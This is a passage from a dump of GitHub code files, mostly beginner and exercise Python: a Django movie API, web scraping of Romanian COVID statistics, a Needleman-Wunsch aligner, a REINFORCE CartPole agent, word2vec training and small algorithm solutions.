gf.create_grid(ai_settings, screen, raindrops)\r\n \r\n # Start the main loop for the program\r\n \r\n while True:\r\n gf.check_events(ai_settings, screen)\r\n gf.remove_raindrops(ai_settings, raindrops)\r\n gf.falling_raindrops(ai_settings, raindrops)\r\n gf.update_screen(ai_settings, screen, raindrops)\r\n\r\nrun_game()\r\n\r\n","repo_name":"dansoh/python-intro","sub_path":"python-crash-course/exercises/chapter-13/13-3/raindrops.py","file_name":"raindrops.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73038914065","text":"from django.shortcuts import render, redirect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.parsers import JSONParser\nfrom django.http.response import JsonResponse\n\nfrom MoviesAPP.models import Movie\nfrom MoviesAPP.serializers import MovieSerializer\n\n# Create your views here.\n\n\n@csrf_exempt\ndef movieAPI(request, id=0):\n if request.method == 'GET' and id != 0:\n employee = Movie.objects.get(id=id)\n movie_serializer = MovieSerializer(employee, many=False)\n return JsonResponse(movie_serializer.data, safe=False)\n elif request.method=='GET':\n movies = Movie.objects.all()\n movies_serializer=MovieSerializer(movies,many=True)\n return JsonResponse(movies_serializer.data,safe=False)\n elif request.method=='POST':\n movie_data=JSONParser().parse(request)\n movies_serializer=MovieSerializer(data=movie_data)\n if movies_serializer.is_valid():\n movies_serializer.save()\n return JsonResponse(\"Added Successfully\",safe=False)\n return JsonResponse(\"Failed to Add\",safe=False) \n elif request.method=='PUT':\n movie_data=JSONParser().parse(request)\n movie=Movie.objects.get(movieID=movie_data['movieID'])\n movies_serializer=MovieSerializer(movie, data=movie_data)\n if movies_serializer.is_valid():\n movies_serializer.save()\n return JsonResponse(\"Updated Successfully\",safe=False)\n return JsonResponse(\"Failed to Update\",safe=False) \n elif request.method=='DELETE':\n movie=Movie.objects.get(movieID=id)\n movie.delete()\n return JsonResponse(\"Deleted Successfully\",safe=False)\n","repo_name":"xovnsi/CinemaDGS","sub_path":"CinemaDGS_Project/MoviesAPP/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41161281031","text":"import numpy as np\r\nfrom math import tau\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef coord(pixelarray):\r\n \"\"\"\r\n 
Calculates the x and y coordinates\r\n :param pixelarray: 2D array with the x and y coordinates\r\n :return: 5D array with x-coord, y-coord, the angles(t_list), range of x-axis and y-axis\r\n \"\"\"\r\n x_coor = [i[0] for i in pixelarray]\r\n y_coor = [i[1] for i in pixelarray]\r\n\r\n t_coor = np.linspace(0, tau, len(x_coor)) # now we can relate f(t) -> x,y\r\n\r\n x_list = x_coor - np.mean(x_coor)\r\n y_list = y_coor - np.mean(y_coor)\r\n for i in range(len(y_list)):\r\n if y_list[i] < 0 or y_list[i] > 0:\r\n y_list[i] = y_list[i] * -1\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n ax.plot(x_list, y_list)\r\n\r\n # later we will need these data to fix the size of figure\r\n xlim_data = plt.xlim()\r\n ylim_data = plt.ylim()\r\n\r\n # plt.show()\r\n lists_coor = np.array((x_list, y_list, t_coor, xlim_data, ylim_data))\r\n return lists_coor\r\n\r\n ##### coord(pixelarray)[0] = x_list\r\n ##### coord(pixelarray)[1] = y_list\r\n ##### coord(pixelarray)[2] = t_list\r\n ##### coord(pixelarray)[3] = x_lim\r\n ##### coord(pixelarray)[4] = y_lim\r\n","repo_name":"JeromeVandeVelde/2DFourier","sub_path":"Coordinates.py","file_name":"Coordinates.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29689071105","text":"import math\n\ndef solution(n):\n answer = 0\n arr = [False for i in range(n)]\n arr[1] = True\n \n for i in range(2,int(math.sqrt(n))+1):\n \n if (arr[i] == True):\n continue\n \n if ((n-1)%i == 0):\n return i\n \n for j in range(i,n,i):\n arr[j] = True\n \n return n-1","repo_name":"SonJinHYo/CodingTest","sub_path":"프로그래머스/lv1/87389. 나머지가 1이 되는 수 찾기/나머지가 1이 되는 수 찾기.py","file_name":"나머지가 1이 되는 수 찾기.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4708265206","text":"from bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\n\n\nreq = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-20-ianuarie-ora-13-00/')\nlink = BeautifulSoup(req.text, 'html.parser') # col1, col2, col3\n\nreq_21 = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-21-ianuarie-ora-13-00/')\nlink_21 = BeautifulSoup(req_21.text, 'html.parser') # col4 link_21 de la data 21.01....\n\nreq_22 = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-22-ianuarie-ora-13-00/')\nlink_22 = BeautifulSoup(req_22.text, 'html.parser') # col5\n\nreq_23 = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-23-ianuarie-ora-13-00/')\nlink_23 = BeautifulSoup(req_23.text, 'html.parser') # col6\n\nreq_24 = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-24-ianuarie-ora-13-00/')\nlink_24 = BeautifulSoup(req_24.text, 'html.parser') # col7\n\nreq_25 = requests.get('https://www.mai.gov.ro/informare-covid-19-grupul-de-comunicare-strategica-25-ianuarie-ora-13-00/')\nlink_25 = BeautifulSoup(req_25.text, 'html.parser') # col8\n\n\n\ncol1 = []\ncol2 = []\n\ncol3 = []\ncol4 = []\ncol5 = []\ncol6 = []\ncol7 = []\ncol8 = []\n\nhead_ = [] # aici am introdus separat doar \"NR CRT\", \"JUDET\", \"20.01\" ,\"21.01\" etc...\ntotal = [] # cuvantul \"TOTAL\" din site l am \"curatat\" avea scris

 

.. si apenduit la col1\nclean = ''\n\nmatch = link.find_all('tr') # pentru col1, col2, col3\nmatch4 = link_21.find_all('tr') # col4\nmatch5 = link_22.find_all('tr') # col5\nmatch6 = link_23.find_all('tr') # col6\nmatch7 = link_24.find_all('tr') # col7\nmatch8 = link_25.find_all('tr') # col8\n\nmatch2 = link.find_all('table', attrs={'width': '710'}) # pt head_\nfor x in match:\n for y in x.find_all('td', attrs={'width': '47'}):\n col1.append(y.text)\ndel col1[0] # am sters primul index \"NR CRT\" si l am pus in head_ si la fel la restul in continuare....\n\nfor x in match:\n for z in x.find_all('td', attrs={'width': '151'}):\n col2.append(z.text)\ndel col2[0]\n\nfor x in match:\n for z in x.find_all('td', attrs={'width': '189'}):\n col3.append(z.text)\ndel col3[0]\n\nfor x in match4:\n for z in x.find_all('td', attrs={'width': '189'}):\n col4.append(z.text)\ndel col4[0]\n\nfor x in match5:\n for z in x.find_all('td', attrs={'width': '189'}):\n col5.append(z.text)\ndel col5[0]\n\nfor x in match6:\n for z in x.find_all('td', attrs={'width': '189'}):\n col6.append(z.text)\ndel col6[0]\n\nfor x in match7:\n for z in x.find_all('td', attrs={'width': '189'}):\n col7.append(z.text)\ndel col7[0]\n\nfor x in match8:\n for z in x.find_all('td', attrs={'width': '189'}):\n col8.append(z.text)\ndel col8[0]\n\n\nfor x in match2:\n for z in x.find_all('strong'):\n head_.append(z.get_text())\n\nfor x in match2: # \"TOTAL\" curatat si apenduit pe col1\n for z in x.find_all('td', attrs={'width': '198'}):\n total.append(z.get_text())\n\nclean = str(total)\nclean = clean[6:11]\ntotal = clean\ncol1.append(total)\n\nhead_[2] = '20.01' # am introdus manual la pozitiile head_ data si luna corespunzatoare......\nhead_[3] = '21.01' # head_ pana la index[4] avea date am scris peste...am lasat primele 2 \"NR CRT\" si \"JUDET\"\nhead_[4] = '22.01' # head_ din for-ul de mai sus avea 4 index-uri si dupa am appenduit...\nhead_.append('23.01')\nhead_.append('24.01')\nhead_.append('25.01')\n\ndel col5[43] # aici copiaza de pe site caractere garbage pe cele 3 coloane si am sters...\ncol6=col6[0:44]\ncol7=col7[0:44]\n\n\n# aici am reglat lungimea sirurilor sa fie egale , dupa cel mai lung si cele scurte le am umplut cu ' '\n# pt a converti in tabel multidimensional in pandas\nmax_col=int(len(col1)) ,int(len(col2)), int(len(col3)), int(len(col4)),int(len(col5)), int(len(col6)), int(len(col7)), int(len(col8))\nmax_col = max(max_col) # max_col l-am covertit la INT din tuple... 
sa pot lucra la if...\n\ncount_reglare = 0\nif len(col1) < max_col:\n rez_reglare = (max_col-len(col1))\n for i in range(0,rez_reglare):\n col1.append(' ')\n\nif len(col2) < max_col:\n rez_reglare=(max_col-len(col2))\n for i in range(0,rez_reglare):\n col2.append(' ')\n\nif len(col3) < max_col:\n rez_reglare=(max_col-len(col3))\n for i in range(0,rez_reglare):\n col3.append(' ')\n\nif len(col4) < max_col:\n rez_reglare=(max_col-len(col4))\n for i in range(0,rez_reglare):\n col4.append(' ')\n\nif len(col5) < max_col:\n rez_reglare=(max_col-len(col5))\n for i in range(0,rez_reglare):\n col5.append(' ')\n\nif len(col6) < max_col:\n rez_reglare=(max_col-len(col6))\n for i in range(0,rez_reglare):\n col6.append(' ')\n\nif len(col7) < max_col:\n rez_reglare=(max_col-len(col7))\n for i in range(0,rez_reglare):\n col7.append(' ')\n\nif len(col8) < max_col:\n rez_reglare=(max_col-len(col8))\n for i in range(0,rez_reglare):\n col8.append(' ')\n\n\n\ntitled_column ={ head_[0] : col1, # am introdus datele de tip-ul dictionar pt pandas\n head_[1] : col2,\n head_[2] : col3,\n head_[3] : col4,\n head_[4] : col5,\n head_[5] : col6,\n head_[6] : col7,\n head_[7] : col8,\n }\ndata = pd.DataFrame(titled_column)\nwriter=pd.ExcelWriter('temacovid_.xlsx') # aici am scris si salvat in Excel, am scos index-ul\ndata.to_excel(writer,sheet_name='temaCOVID',index=False)\nwriter.save()\n\n","repo_name":"toni1333/National-Python-11","sub_path":"saptamana5_web-intro/temaCOVID.py","file_name":"temaCOVID.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13810482680","text":"#物品库存系统\nstores={\"apple\":50,\"pear\":60,\"bnana\":90,\"orange\":40,\"lemon\":30}\nprint(\"欢迎登陆物品查询系统!\")\nusername=input(\"请输入用户名:\")\npassword=input(\"请输入密码:\")\nif username!=\"lee\" or password!=\"147258\":\n\tprint(\"您输入的用户名或密码错误!请从新输入:\")\nelse:\n\tprint(\"恭喜您成功登入!\")\n\tmenu=[\"1.查询\",\"2.修改\",\"3.录入\",\"4.删除\",\"5.列表\",\"6.退出\"]\n\tfor i in menu:\n\t print(i)\n\toper=int(input(\"请输入操作数:\"))\n\tif oper==1:\n\t\tname=input(\"请输入物品名:\")\n\t\tif name in stores:\n\t\t\tprint(\"{0}的数量为{1}个\".format(name,stores[name]))\n\t\telse:\n\t\t\tprint(\"此物品暂无!\")\n\tif oper==2:\n\t\tname1=input(\"请输入需要修改的物品名:\")\n\t\tif name1 in stores:\n\t\t\ta=int(input(\"请输入需要修改为:\"))\n\t\t\tstores[name1]=a\n\t\t\tprint(\"{0}修改后,数量为{1}个\".format(name1,stores[name1]))\n\t\telse:\n\t\t\tprint(\"输入的商品错误!\")\n\tif oper==3:\n\t\tname2=input(\"请输入新的物品名:\")\n\t\tstores[name2]=int(input(\"数量为:\"))\n\t\tprint(\"{0},{1}个\".format(name2,stores[name2]))\n\tif oper==4:\n\t\tname3=input(\"请输入需要删除的物品:\")\n\t\tif name3 in stores:\n\t\t\tstores.pop(name3)\n\t\telse:\n\t\t\tprint(\"库存中无此商品!\")\n\tif oper==6:\n\t\tprint(\"您已退出系统!\")\n\tif oper==5:\n\t\tfor k in stores:\n\t\t\tprint(\"{0}的数量为{1}\".format(k,stores[k]))\n\n\t\t\t\n\n\n\n\n\n\n\n \n","repo_name":"lf147258/beautiful-day","sub_path":"store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40540773274","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nNEEDLEMAN-WUNSCH - Global alignment with gaps\n\"\"\"\n# Visualize in matrix form\ndef print_matrix(m):\n for i in range(len(m)):\n value = \"\"\n for j in range(len(m[0])):\n value += str(m[i][j]) + \"\\t\"\n print(value, \"\\n\")\n \ndef global_align(s1, s2, sub_matrix, d):\n \"\"\"\n Calculates the global dynamic programming (scoring) 
matrix\n \"\"\"\n rows = len(s1) + 1 # num of rows for seq1 and + 1 for f(0,0)\n columns = len(s2) + 1 # num of columns for seq2 and + 1 for f(0,0)\n \n # Init matrix with 0 and dimensions rows * columns\n F = [[0] * columns for x in range(rows)]\n P = [[0] * columns for x in range(rows)]\n \n # Init. rows\n for i in range(rows):\n F[i][0] = d * i\n P[i][0] = 'l'\n # Init. columns\n for j in range(columns):\n F[0][j] = d * j\n P[0][j] = 'u'\n \n # Iteration to fill matrices P and F\n for i in range(1, rows): # Rows\n for j in range(1, columns): # Columns\n # Previous value in the diagonal + gap\n sDiagonal = F[i-1][j-1] + sub_matrix[s1[i-1] + s2[j-1]] \n sColumn = F[i-1][j] + d # Fill columns\n sRow = F[i][j-1] + d # Fill rows\n \n # Get the maximun value\n max_value = max(sDiagonal, sColumn, sRow)\n \n # Add u = up, l = left and d = diagonal in the matrix P\n if max_value == sDiagonal:\n P[i][j] = \"d\"\n elif max_value == sColumn:\n P[i][j] = \"l\"\n else:\n P[i][j] = \"u\"\n \n F[i][j] = max_value\n\n return F,P\n\ndef alignment(s1, s2, F, P):\n # print_matrix(F)\n # print(\"\\n\")\n # print_matrix(P)\n \n \"\"\" \n This function will align the s1 and the s2 using P matrix. \n In the case of matrix F, we wil use to extract the value of the alignment\n \"\"\"\n i = len(P) - 1; j = len(P[0]) -1 # Start from the last position on the matrix\n template = \"\"; target = \"\"; score = F[i][j]\n while i != 0 and j != 0:\n # Use gaps when the movement is to left or up, we are add a gap \"-\". Means no match.\n # Left - Target, Up - Template\n if P[i][j] == \"d\":\n template += s1[i - 1]\n target += s2[j - 1]\n i -= 1\n j -= 1 \n elif P[i][j] == \"l\":\n template += s1[i - 1]\n target += \"-\"\n i -= 1\n j -= 1\n else:\n template += \"-\"\n target += s2[j - 1]\n i -= 1\n j -= 1\n # Reverse template and target \n template = template[::-1]\n target = target[::-1]\n print(template)\n print(target)\n print(score)\n\nif __name__ == \"__main__\":\n # Sequences without gaps\n s1 = \"ACCCA\" # Rows\n s2 = \"ACT\" # Columns\n d = -2\n \n sub_matrix = {\"AA\": 2, \"AC\": -1, \"AT\": -1, \"AG\": 0,\n \"CA\": -1, \"CC\": 2, \"CT\": 0, \"CG\": -1,\n \"TA\": -1, \"TC\":0, \"TT\": 2, \"TG\": -1,\n \"GA\": 0, \"GC\": -1, \"GT\": -1, \"GG\": 2} \n\n F, P = global_align(s1, s2, sub_matrix, d)\n alignment(s1, s2, F, P)","repo_name":"naiaralandeta/programming_naiara_landeta","sub_path":"exercise/NW.py","file_name":"NW.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30652395146","text":"from unittest import TestCase\nfrom unittest.mock import patch\n\nfrom task import get_coin_price\n\n\nclass TestTask(TestCase):\n\n @patch(\"task.get_coin_id\", lambda coin_code: -1)\n def test_get_coin_price_no_coin_data(self):\n coin_price = get_coin_price(\"btc\", \"uah\")\n\n self.assertEqual(coin_price, \"There is no data for coin with the 'btc' code\")\n\n @patch(\"task.get_coin_data\", lambda coin_code: {\"market_data\": {\"current_price\": {}}})\n def test_get_coin_price_no_currency_data(self):\n coin_price = get_coin_price(\"btc\", \"uah\")\n\n self.assertEqual(coin_price, \"There is no price data for currency with the 'uah' code\")\n\n @patch(\"task.get_coin_data\", lambda coin_code: {\"market_data\": {\"current_price\": {\"uah\": 10350000}}})\n def test_get_coin_price(self):\n coin_price = get_coin_price(\"btc\", \"uah\")\n\n self.assertEqual(coin_price, 
10350000)\n","repo_name":"radik1999/Test_task","sub_path":"test_task.py","file_name":"test_task.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31080906695","text":"from sortedcontainers import SortedList\n\nclass Solution:\n def numberOfPairs(self, nums1: List[int], nums2: List[int], diff: int) -> int:\n arr = SortedList()\n count = 0\n \n for num1,num2 in zip(nums1,nums2):\n count+=arr.bisect_right(num1-num2+diff)\n arr.add(num1-num2)\n \n return count","repo_name":"Merwan-J/competetive-programming","sub_path":"2426-number-of-pairs-satisfying-inequality/2426-number-of-pairs-satisfying-inequality.py","file_name":"2426-number-of-pairs-satisfying-inequality.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41668695650","text":"\ndef loadListIntoDictonary(list):\n dictonary = {}\n for word in list:\n if word in dictonary:\n dictonary[word] += 1\n else:\n dictonary[word] = 1\n return dictonary\n\ndef checkMagazine(magazine, note):\n magazineDictonary = loadListIntoDictonary(magazine)\n noteDictonary = loadListIntoDictonary(note)\n for word in noteDictonary:\n if not word in magazineDictonary:\n return \"No\"\n if noteDictonary[word] > magazineDictonary[word]:\n return \"No\"\n return \"Yes\"","repo_name":"dustinrubin/FiLLIP","sub_path":"hashRansom/ransomNoteDustin.py","file_name":"ransomNoteDustin.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19116308705","text":"import copy\nimport pylab\nimport numpy as np\nimport sys\nif \"../\" not in sys.path:\n sys.path.append(\"../\") \nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras.models import Sequential\nfrom keras import backend as K\nimport gym\n\n# 그리드월드 예제에서의 REINFORCE 에이전트\nclass ReinforceAgent:\n def __init__(self):\n # 가능한 모든 행동 정의\n self.action_space = [0, 1]\n # 상태와 행동의 크기 정의\n self.action_size = len(self.action_space)\n self.state_size = 4\n self.discount_factor = 0.99 \n self.learning_rate = 0.001\n\n self.model = self.build_model()\n self.optimizer = self.optimizer()\n self.states, self.actions, self.rewards = [], [], []\n\n \n \n # 상태가 입력, 각 행동의 확률이 출력인 인공신경망 생성\n def build_model(self):\n model = Sequential()\n model.add(Dense(24, input_dim=self.state_size, activation='relu'))\n model.add(Dense(24, activation='relu'))\n model.add(Dense(self.action_size, activation='softmax'))\n return model\n \n # 정책신경망을 업데이트 하기 위한 오류함수와 훈련함수의 생성\n def optimizer(self):\n action = K.placeholder(shape=[None, 2])\n discounted_rewards = K.placeholder(shape=[None, ])\n \n # 크로스 엔트로피 오류함수 계산\n action_prob = K.sum(action * self.model.output, axis=1)\n cross_entropy = K.log(action_prob) * discounted_rewards\n loss = -K.sum(cross_entropy)\n \n # 정책신경망을 업데이트하는 훈련함수 생성\n optimizer = Adam(lr=self.learning_rate)\n updates = optimizer.get_updates(self.model.trainable_weights, [], loss)\n train = K.function([self.model.input, action, discounted_rewards], [],\n updates=updates)\n\n return train\n\n # 정책신경망으로 행동 선택\n def get_action(self, state):\n policy = self.model.predict(state)[0]\n return np.random.choice(self.action_size, 1, p=policy)[0]\n \n # 반환값 계산\n def discount_rewards(self, rewards):\n discounted_rewards = np.zeros_like(rewards)\n running_add = 0\n for t in reversed(range(0, len(rewards))):\n running_add = 
running_add * self.discount_factor + rewards[t]\n            discounted_rewards[t] = running_add\n        return discounted_rewards\n    \n    # Store the states, actions, and rewards for one episode\n    def append_sample(self, state, action, reward):\n        self.states.append(state[0])\n        self.rewards.append(reward)\n        act = np.zeros(self.action_size)\n        act[action] = 1\n        self.actions.append(act)\n\n    # Update the policy network\n    def train_model(self):\n        discounted_rewards = np.float32(self.discount_rewards(self.rewards))\n        discounted_rewards -= np.mean(discounted_rewards)\n        discounted_rewards /= np.std(discounted_rewards)\n        \n        states = np.array(self.states)\n        actions = np.array(self.actions)\n        self.optimizer([states, actions, discounted_rewards])\n        self.states, self.actions, self.rewards = [], [], []\n\nEPISODES = 800\n\nif __name__ == \"__main__\":\n    env = gym.make('CartPole-v1')\n    agent = ReinforceAgent()\n    \n    global_step = 0\n    scores, episodes = [], []\n    \n    for e in range(EPISODES):\n        done = False\n        score = 0\n        state = env.reset()\n        state = np.reshape(state, [1,4])\n        \n        while not done:\n            env.render()\n            global_step += 1\n            \n            action = agent.get_action(state)\n            next_state, reward, done, _ = env.step(action)\n            next_state = np.reshape(next_state, [1,4])\n            reward = reward if not done or score == 499 else -100\n            agent.append_sample(state, action, reward)\n            \n            score += reward\n            state = copy.deepcopy(next_state)\n            \n            if done:\n                agent.train_model()\n                score = score if score == 500.0 else score + 100\n                scores.append(score)\n                episodes.append(e)\n                score = round(score, 2)\n                print(\"episode: \", e, \" score: \", score, \" time_step: \", global_step)\n    \n        # Stop once the average score of the last 10 episodes exceeds 490\n        if np.mean(scores[-min(10, len(scores)):]) > 490:\n            sys.exit()","repo_name":"hyunhakim/RL-base-study","sub_path":"PolicyGradient/REINFORCE.py","file_name":"REINFORCE.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42032668871","text":"\"\"\"\n\n\"\"\"\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\nimport os\n\nimport walks as serialized_walk\nfrom gensim.models import Word2Vec\nimport Skipgram as skg\n\n\n# if not args.vertex_freq_degree:\n#     vertex_counts = serialized_walk.count_textfiles(walk_files, args.workers)\n# else:\n#     vertex_counts = G.degree(nodes=G.keys())\n# logger.info(\"Training...\")\n# # Build the corpus\n# walks_corpus = serialized_walk.WalksCorpus(walk_files)\n# model = Skipgram(sentences=walks_corpus, vocabulary_counts=vertex_counts, size=args.representation_size,\n#                  window=args.window_size, min_count=0, trim_rule=None, workers=args.workers)\n# model.wv.save_word2vec_format(args.output)\n\ndef main():\n    parse = ArgumentParser(description=\"word2vec parser\", formatter_class=ArgumentDefaultsHelpFormatter,\n                           conflict_handler='resolve')\n    parse.add_argument('--representation-size', type=int, default=100, help=\"embedding dimension\")\n    parse.add_argument(\"--window-size\", type=int, default=10, help=\"window size\")\n    parse.add_argument(\"--min-count\", type=int, default=0, help=\"minimum token count\")\n    parse.add_argument(\"--workers\", type=int, default=4, help=\"number of CPU cores\")\n\n    args = parse.parse_args()\n    process(args)\n\n\ndef process(args):\n    basePath = r\"D:\\\\workspace\\\\pproject\\\\deepwalk\\\\example\\\\textoot1\"\n    files = []\n    for i in range(0, 8):\n        files.append(os.path.join(basePath, str(i)))\n\n    vertex_count = serialized_walk.count_textfiles(files, 4)\n    corpus = serialized_walk.combine_files_iter(files, 4)\n    model = skg.Skipgram(sentences=corpus, vocabulary_counts=vertex_count, 
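A quick numeric check of the backward recurrence used by `discount_rewards` above, G_t = r_t + γ·G_{t+1} (standalone sketch):

```python
import numpy as np

def discount_rewards(rewards, gamma=0.99):
    # Same backward recurrence as ReinforceAgent.discount_rewards:
    # G_t = r_t + gamma * G_{t+1}
    discounted = np.zeros_like(rewards, dtype=np.float64)
    running_add = 0.0
    for t in reversed(range(len(rewards))):
        running_add = running_add * gamma + rewards[t]
        discounted[t] = running_add
    return discounted

# With gamma = 0.5 and rewards [1, 1, 1] the returns are
# [1 + 0.5*(1 + 0.5*1), 1 + 0.5*1, 1] = [1.75, 1.5, 1.0].
assert np.allclose(discount_rewards([1.0, 1.0, 1.0], gamma=0.5), [1.75, 1.5, 1.0])
```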
size=args.representation_size,\n                         window=args.window_size, min_count=0, trim_rule=None, workers=args.workers)\n    model.wv.save_word2vec_format(os.path.join(basePath, \".emb\"))\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Sparkoor/learning","sub_path":"deepwalk/Word2VecMain.py","file_name":"Word2VecMain.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11387489476","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\n\"\"\"\nCreated on Fri Feb 17 12:38:44 2017\n@author: ahefny, zmarinho\n\"\"\"\nimport numpy as np\n\nimport rpsp.globalconfig as globalconfig\nfrom rpsp.run.test_utils.plot import call_plot, save_model\n\nclass Log(object):\n    def __init__(self, args, filename, n=3, pred_model=None):\n        self._pp = call_plot(name=filename, n=n, trial=args.trial)\n        self._pred_model = pred_model\n        self._args = args\n        self._irate = args.irate\n        self._last_err = np.inf\n        self.avg_traj = []\n        self._results = {'act': [], 'rewards': [], 'rwd': [], 'obs': [],\n                         'mse': [], 'exp': filename, 'rng': [], 'env_states': []}\n        self.msg = []\n\n    def log(self, msg):\n        if globalconfig.vars.args.verbose:\n            self.msg.append(msg)\n\n\n    def logger(self, i, trajs, res, track_delta=False):\n        # Output stats\n        C = [np.sum(t.rewards) for t in trajs]\n        m = np.mean(C)\n        s = np.std(C)\n        wdecay = 1.0 if self._args.wdecay is None else self._args.wdecay\n        wpred = self._args.grad_step if self._args.wpred is None else self._args.wpred\n        rwd_coeff = self._args.wrwd if self._args.wrwd > 0.0 else self._args.wrwd_only\n        wrwd = self._args.trpo_step if rwd_coeff is None else rwd_coeff\n        res['best_vel_avg'] = np.mean(trajs[trajs[-1].bib].vel)\n        res['best_vel_min'] = np.min(trajs[trajs[-1].bib].vel)\n        res['best_vel_max'] = np.max(trajs[trajs[-1].bib].vel)\n        res['best_rwd'] = np.sum(trajs[trajs[-1].bib].rewards)\n        if self._pred_model is None:\n            if (i % self._irate == 0):\n                # self._pp.plot_single(m,s)\n                self._pp.plot_traj(trajs[0], trajs[0].obs)\n                self._pp.plot(np.mean(res.get('cost1_avg', 0.)), np.std(res.get('cost1_avg', 0.)),\n                              np.mean(res.get('fvel_avg', 0.0)), np.std(res.get('fvel_avg', 0.0)),\n                              m, s, False, label_2='vel')\n        else:\n            normalizer = float(wpred * wdecay ** i) if wpred > 0.0 else wdecay ** i\n            emse = (res.get('total_cost', 0.) 
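The `Skipgram` wrapper above forwards its arguments to gensim's `Word2Vec`; a minimal direct-gensim sketch (the keyword name differs across gensim versions, so verify against your installed release):

```python
from gensim.models import Word2Vec

# walks: an iterable of token lists, e.g. the random-walk corpus built above.
walks = [["1", "2", "3"], ["2", "4", "1"]]

# gensim < 4.0 called this parameter `size`; gensim >= 4.0 renamed it to
# `vector_size`.
model = Word2Vec(walks, vector_size=100, window=10, min_count=0, workers=4)
model.wv.save_word2vec_format("walks.emb")
```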
- wrwd * res.get('reinf_cost_avg', 0.)) / normalizer\n            R = [emse]\n            self._results['mse'].append(R)\n            if track_delta:\n                ## track the difference from the average trajectory, for exploration evaluation\n                avg = np.zeros((self._args.numtrajs, self._args.len, trajs[0].obs.shape[1]))\n                for k, t in enumerate(trajs):\n                    avg[k, :t.obs.shape[0], :] = t.obs / float(t.obs.shape[0])\n                self.avg_traj.append(np.sum(avg, axis=0))\n                self.log('\\t\\tdelta_batch_avg:{} delta_prev_avg:{}'.format(\n                    np.linalg.norm(np.mean([(t.obs - self.avg_traj[-1][:t.obs.shape[0]]) ** 2], axis=0)),\n                    np.linalg.norm(np.mean([(t.obs - 0.0\n                    if len(self.avg_traj) < 2\n                    else self.avg_traj[-2][:t.obs.shape[0]]) ** 2], axis=0)),\n                ))\n            self._last_err = np.mean(np.copy(R))\n            if (i % self._irate == 0):\n                try:\n                    reinf = res.get('trpo_cost', 0.)\n                except KeyError:\n                    reinf = res.get('cost2_avg', 0.)\n                self._pp.plot(np.mean(res.get('cost1_avg', 0.)), np.std(res.get('cost1_avg', 0.)),\n                              np.mean(res.get('fvel_avg', 0.0)), np.std(res.get('fvel_avg', 0.0)),\n                              m, s, False, label_2='vel')\n                tpred = self._pred_model.traj_predict_1s(trajs[0].states, trajs[0].act)\n                self._pp.plot_traj(trajs[0], tpred)\n\n        self.log('reg:{} psr_step:{} rwd_w:{} past:{} fut:{}'.format(self._args.reg, self._args.grad_step, self._args.wrwd,\n                                                                     self._args.past, self._args.fut))\n        self.log('\\t\\t\\t\\t\\t\\t' + '\\t\\t\\t\\t\\t\\t'.join(['{}={}\\n'.format(k, res.get(k, 0.0)) for k in res.keys()]))\n        self._results['rewards'].append([np.sum(t.rewards) for t in trajs])\n\n        if (i % 50 == 0):\n            self._results['env_states'].append([trajs[trajs[-1].bib].env_states])\n            self._results['rwd'].append([trajs[trajs[-1].bib].rewards])\n            self._results['act'].append([trajs[trajs[-1].bib].act])\n            self._results['rng'].append([trajs[trajs[-1].bib].rng])\n            self._results['obs'].append([trajs[trajs[-1].bib].obs])\n        if (i % (self._args.prate) == 0):\n            # save pickle results\n            save_model(self._args.method + '_trial%d' % self._args.trial, self._args.flname, self._results, self._args)\n        return False","repo_name":"ahefnycmu/rpsp","sub_path":"rpsp/run/test_utils/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":4792,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"2792468725","text":"#from django.test import LiveServerTestCase\nfrom unittest import skip\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n#import unittest\n\nclass ToDoFunctionalTest(StaticLiveServerTestCase):\n    # before every test, set up\n    def setUp(self):\n        self.browser = 